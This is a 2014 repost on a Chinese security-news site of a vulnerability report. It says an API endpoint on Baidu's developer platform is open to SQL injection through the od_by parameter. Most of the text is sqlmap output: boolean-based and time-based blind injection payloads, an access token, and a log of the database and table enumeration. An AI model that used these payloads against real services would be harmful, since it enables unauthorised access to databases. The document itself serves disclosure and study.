欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

百度开放平台某SQL注入

来源:本站整理 作者:佚名 时间:2014-09-05 TAG: 我要投稿

百度开放平台某SQL注入发现只修复了参数 sort,居然没有注意到 od_by
http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,注入点&access_token=TOKEN&_=1404913266225
参数 od_by 也是存在SQL 注入。你们再检查下吧

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: od_by

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND 6232=6232),1,(select 1 union select 2)))&sor

t=asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND SLEEP(5)),1,(select 1 union select 2)))&sort

=asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347

---

[19:27:34] [INFO] testing MySQL

[19:27:34] [INFO] confirming MySQL

[19:27:35] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL >= 5.0.0

[19:27:35] [INFO] fetching database names

[19:27:35] [INFO] fetching number of databases

[19:27:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[19:27:35] [INFO] retrieved: 4

[19:27:36] [INFO] retrieved: information_schema

[19:28:09] [INFO] retrieved: mco_***************

[19:28:47] [INFO] retrieved: mco_***************

[19:29:16] [INFO] retrieved: mco_***************

available databases [4]:

[*] information_schema

[*] mco_***************

[*] mco_***************

[*] mco_***************





[*] shutting down at 19:29:53







back-end DBMS: MySQL >= 5.0.0

[20:14:02] [INFO] fetching tables for database: 'mco_***************'

[20:14:02] [INFO] fetching number of tables for database 'mco_***************'

[20:14:02] [INFO] resumed: 98

[20:14:02] [INFO] resumed: answer

[20:14:02] [INFO] resumed: devel***************

[20:14:02] [INFO] resumed: devel***************

[20:14:02] [INFO] resumed: devel***************

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载